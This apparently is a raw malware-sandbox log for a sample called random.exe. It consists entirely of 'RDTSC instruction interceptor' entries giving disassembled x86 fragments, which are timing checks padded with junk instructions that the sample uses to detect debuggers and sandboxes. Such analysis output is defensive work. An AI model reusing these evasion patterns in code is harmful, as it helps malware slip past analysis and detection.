Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111DE14 second address: 111DE2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4C45470A7Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111DE2B second address: 111DE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111DE30 second address: 111DE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E40E second address: 111E417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E417 second address: 111E41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E41D second address: 111E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007F4C44C2BE2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E5B4 second address: 111E5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E5B8 second address: 111E5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4C44C2BE26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E5C4 second address: 111E5E4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C45470A78h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C45470A82h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E5E4 second address: 111E5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E749 second address: 111E75C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jl 00007F4C45470A76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E75C second address: 111E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F4C44C2BE26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E76B second address: 111E76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E76F second address: 111E779 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E779 second address: 111E788 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4C45470A7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E788 second address: 111E78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 111E78E second address: 111E796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122A91 second address: 1122A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122A95 second address: 1122A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122A9B second address: 1122AA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122CED second address: 1122CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122CF2 second address: 1122D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122D89 second address: 1122D97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122D97 second address: 1122DBB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C44C2BE36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1122DBB second address: 1122E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F4C45470A76h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jno 00007F4C45470A78h 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F4C45470A78h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+1246134Ch], ebx 0x00000037 call 00007F4C45470A79h 0x0000003c jmp 00007F4C45470A88h 0x00000041 push eax 0x00000042 jmp 00007F4C45470A84h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b push esi 0x0000004c jmp 00007F4C45470A84h 0x00000051 pop esi 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push edx 0x00000058 pop edx 0x00000059 jmp 00007F4C45470A7Bh 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11230D4 second address: 11230D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11230D8 second address: 11230DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1124B24 second address: 1124B36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F4C44C2BE2Eh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11246AE second address: 11246BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C45470A82h 0x00000008 jg 00007F4C45470A76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11246BE second address: 11246DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4C44C2BE35h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0813 second address: 53B0819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0819 second address: 53B0865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6A53h 0x00000007 mov cx, 58AFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4C44C2BE35h 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F4C44C2BE2Eh 0x0000001a mov ebp, esp 0x0000001c jmp 00007F4C44C2BE30h 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0865 second address: 53B0869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0869 second address: 53B086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B086D second address: 53B0873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0873 second address: 53B0879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0879 second address: 53B087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370DCF second address: 5370DE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE33h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370DE6 second address: 5370E13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F4C45470A82h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov al, 64h 0x00000014 movsx edi, cx 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E13 second address: 5370E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E17 second address: 5370E1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E1D second address: 5370E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E23 second address: 5370E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C45470A83h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E41 second address: 5370E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E47 second address: 5370E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370E4B second address: 5370E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C097B second address: 53C09A7 instructions: 0x00000000 rdtsc 0x00000002 mov si, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F4C45470A81h 0x0000000c pop edx 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4C45470A7Ah 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C09A7 second address: 53C09AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 7Fh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C09AE second address: 53C09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C09B4 second address: 53C09B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C09B8 second address: 53C09BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5330BD7 second address: 5330C58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, F3h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4C44C2BE36h 0x0000000e push eax 0x0000000f jmp 00007F4C44C2BE2Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov eax, 1FBB5B3Bh 0x0000001b pushfd 0x0000001c jmp 00007F4C44C2BE30h 0x00000021 sub ecx, 7658B188h 0x00000027 jmp 00007F4C44C2BE2Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 call 00007F4C44C2BE2Bh 0x00000038 pop esi 0x00000039 jmp 00007F4C44C2BE39h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5330D01 second address: 5330D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5330D21 second address: 5330D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5330D25 second address: 5330D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370AE3 second address: 5370AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370AE9 second address: 5370AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370AEF second address: 5370AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 536092F second address: 5360935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360935 second address: 5360939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360939 second address: 5360980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F4C45470A84h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4C45470A7Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360980 second address: 5360986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C019A second address: 53C020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f pushfd 0x00000010 jmp 00007F4C45470A87h 0x00000015 sbb ecx, 14C553BEh 0x0000001b jmp 00007F4C45470A89h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F4C45470A7Eh 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov ax, 7ECDh 0x0000002f popad 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F4C45470A82h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C00F6 second address: 53C00FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C00FC second address: 53C0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0EC5 second address: 53B0EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0EC9 second address: 53B0ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0ECF second address: 53B0EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4C44C2BE30h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4C44C2BE2Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0EF8 second address: 53B0F0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F0E second address: 53B0F14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F14 second address: 53B0F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4C45470A7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F32 second address: 53B0F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F36 second address: 53B0F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F3C second address: 53B0F4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F4D second address: 53B0F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B0F51 second address: 53B0F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ah, bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5370BC4 second address: 5370BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C45470A7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C0513 second address: 53C0565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C44C2BE30h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, C444h 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F4C44C2BE31h 0x00000023 jmp 00007F4C44C2BE2Bh 0x00000028 popfd 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C0565 second address: 53C058B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4C45470A85h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C058B second address: 53C059A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C059A second address: 53C05A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C05A0 second address: 53C05D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c jmp 00007F4C44C2BE2Dh 0x00000011 mov eax, 2A4C47E7h 0x00000016 popad 0x00000017 and dword ptr [eax], 00000000h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F4C44C2BE2Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360812 second address: 5360823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360823 second address: 5360837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360837 second address: 536085E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C45470A80h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 536085E second address: 536086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 536086D second address: 5360873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5360873 second address: 5360877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B08B6 second address: 53B08D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B08D3 second address: 53B08DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E572h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53B08DC second address: 53B0926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F4C45470A86h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F4C45470A80h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4C45470A87h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C031C second address: 53C032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C44C2BE2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53C032C second address: 53C0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
